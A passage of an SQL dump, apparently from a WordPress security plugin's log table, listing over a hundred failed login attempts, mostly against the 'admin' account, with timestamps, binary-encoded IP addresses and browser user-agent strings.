Firefox/30.0'),(885,2962,1694538575.439150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),(886,2963,1694538577.823096,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),(887,2965,1694538591.458197,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(888,2966,1694538591.479803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'),(889,2982,1694543026.036595,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(890,2984,1694544158.524174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36'),(891,2985,1694544160.145149,1,'loginFailValidUsername','admin',1,'*x\0\0\0\0\0\0\0h\0)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(892,2985,1694544160.151491,1,'loginFailValidUsername','admin',1,'*x\0\0\0\0\0\0\0h\0)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(893,2987,1694544169.959715,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0__x','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'),(894,2989,1694544173.907269,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),(895,2990,1694544179.084874,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(896,2992,1694544190.442793,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(897,2999,1694547526.640693,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D4$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(898,3004,1694550087.493571,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(899,3007,1694550104.657158,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(900,3009,1694550111.310961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),(901,3010,1694550113.825807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QFZx','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),(902,3010,1694550113.840298,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QFZx','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),(903,3011,1694550116.139603,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(904,3012,1694550125.502269,1,'loginFailValidUsername','admin',1,' \ZT\0<,','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(905,3016,1694551121.969295,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘E','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(906,3034,1694556057.359746,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0'),(907,3035,1694556059.396017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(908,3038,1694556067.131058,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0~M5','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'),(909,3039,1694556077.205237,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(910,3053,1694563222.017954,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(911,3055,1694563224.201344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'),(912,3056,1694563226.045596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0(L','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'),(913,3058,1694563230.487941,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(914,3059,1694563232.944967,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(915,3061,1694563241.341057,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(916,3063,1694563249.616009,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}r\r','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(917,3064,1694563254.933917,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(918,3065,1694563257.839654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),(919,3066,1694563265.677743,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}r\r','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(920,3069,1694564553.247548,1,'loginFailInvalidUsername','im@rk',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(921,3073,1694566146.428766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Kݣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(922,3079,1694568822.986680,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0t','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(923,3082,1694568864.896984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(924,3082,1694568864.907317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(925,3087,1694568875.696760,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(926,3100,1694573627.701494,1,'loginFailValidUsername','admin',1,'*Y@\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(927,3100,1694573627.715490,1,'loginFailValidUsername','admin',1,'*Y@\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(928,3103,1694574742.314914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(929,3104,1694574743.205713,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0'),(930,3106,1694574750.175816,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(931,3107,1694574750.398758,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(932,3109,1694574753.019080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(933,3110,1694574755.039474,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(934,3111,1694574757.491443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(935,3111,1694574757.498500,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(936,3113,1694574768.528661,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(937,3114,1694574770.476884,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),(938,3116,1694574772.576984,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build/RB3N5C; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.91 Mobile Safari/537.36'),(939,3118,1694574797.330479,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gJf','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(940,3124,1694576674.578529,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0<','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(941,3133,1694580956.112217,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0'),(942,3134,1694580957.618384,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(943,3136,1694580963.445829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(944,3139,1694580972.693066,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(945,3141,1694580980.454627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(946,3141,1694580980.462576,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(947,3143,1694580986.556915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(948,3144,1694580987.205414,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36'),(949,3159,1694588656.213129,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0=#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(950,3160,1694588658.120711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(951,3162,1694588665.789372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),(952,3163,1694588670.890262,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(953,3164,1694588677.791471,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(954,3165,1694588681.461601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),(955,3168,1694588690.061892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(956,3170,1694588696.603418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0- ','Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(957,3171,1694588696.878604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(958,3172,1694588700.816851,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),(959,3187,1694594038.521397,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0YJ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(960,3191,1694595066.937848,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(961,3192,1694595068.328431,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(962,3193,1694595071.796018,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(963,3195,1694595077.617112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(964,3197,1694595080.668732,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(965,3198,1694595083.823904,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6'),(966,3200,1694595094.132452,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(967,3201,1694595102.062409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0'),(968,3202,1694595102.390707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(969,3205,1694595889.544129,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%xS','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(970,3217,1694601039.489582,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(971,3218,1694601041.041859,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),(972,3220,1694601045.665039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'),(973,3221,1694601048.795659,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(974,3222,1694601051.354853,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(975,3223,1694601056.806794,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1'),(976,3224,1694601056.950272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'),(977,3226,1694601074.579311,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'),(978,3230,1694601086.634849,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),(979,3231,1694601087.157123,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),(980,3232,1694601088.409014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),(981,3234,1694601847.167007,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0%d','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0'),(982,3244,1694607336.751145,1,'loginFailValidUsername','admin',1,'*G\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(983,3247,1694607342.948959,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(984,3249,1694607352.185800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'),(985,3253,1694607359.426291,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0PX','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'),(986,3255,1694607365.038410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(987,3256,1694607368.022556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0e4','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1'),(988,3257,1694607380.030748,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g$','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(989,3258,1694607380.455737,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'),(990,3290,1694619304.077627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(991,3293,1694620023.867093,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0PX','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(992,3294,1694620031.172209,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QG','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(993,3296,1694620033.603776,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(994,3298,1694620042.609272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0o}r\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),(995,3299,1694620042.914696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gx','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(996,3300,1694620046.971744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(997,3301,1694620047.621266,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(998,3304,1694620057.659273,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(999,3306,1694621237.655839,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0- u','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(1000,3307,1694621241.542171,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gj{','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0'),(1001,3312,1694621256.507928,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0[yQ','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(1002,3314,1694621263.680637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0GR','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'),(1003,3316,1694621268.011468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1004,3317,1694621269.771690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0C͢','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'),(1005,3320,1694621287.121911,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0QG','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(1006,3321,1694621289.829232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(1007,3322,1694621291.368055,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0'),(1008,3340,1694627386.440760,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0(\0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 